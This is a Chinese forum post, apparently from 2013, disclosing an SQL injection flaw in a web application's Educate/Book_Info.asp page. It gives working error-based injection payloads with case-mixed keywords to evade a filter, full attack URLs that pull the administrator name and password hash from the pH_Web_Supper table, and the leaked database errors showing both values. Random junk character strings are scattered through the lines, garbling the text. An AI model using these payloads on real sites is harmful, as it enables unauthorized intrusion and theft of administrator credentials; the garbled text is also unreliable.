漏洞出现在Educate/Book_Info.asp + K/ j8 }, @' r1 R% U
2 @$ B7 d& X, Q' t
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出; l; N: R6 B1 S+ l/ c
7 s" z: ~- h2 w; |
exp:如下
5 X/ u% y( S' m1 |' W查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)/ D3 }4 _8 ^: H" d, n5 G* t$ e
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
3 z M- d @9 C0 y0 j" x0 C & s! D! u! I% D& u- x1 {) x
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)8 f _3 N" W* J0 O
% R0 e+ B" @5 B/ ?3 }; l" T
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
6 I' U1 ?9 l1 j) D# A* M ! i" k+ F- }! m+ k1 z, Y
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
1 b# W5 M1 S2 ]7 a2 f# l & ^4 J; V. S: S. M3 ]. l/ N
/Educate/Book_Info.asp,行 8
" l7 X7 r, j* k. a a8 c. I, A) ~& P/ X
6 `3 W5 A! {0 H9 j Fhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
# p8 Q6 v; I% {8 N
% p( S, W$ f, SMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'. d) C- b: M# K- f$ O4 s* O
. G# t5 c+ z( r: d% C7 W* ?8 y
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。0 V. C9 \2 H, `9 \
) ^* s& O( \, g% I+ I$ C: I( T
/Educate/Book_Info.asp,行 8) W# z6 ^% W$ h. n; e$ p5 d
|
发表于 2013-2-16 21:44:16
收藏
支持
反对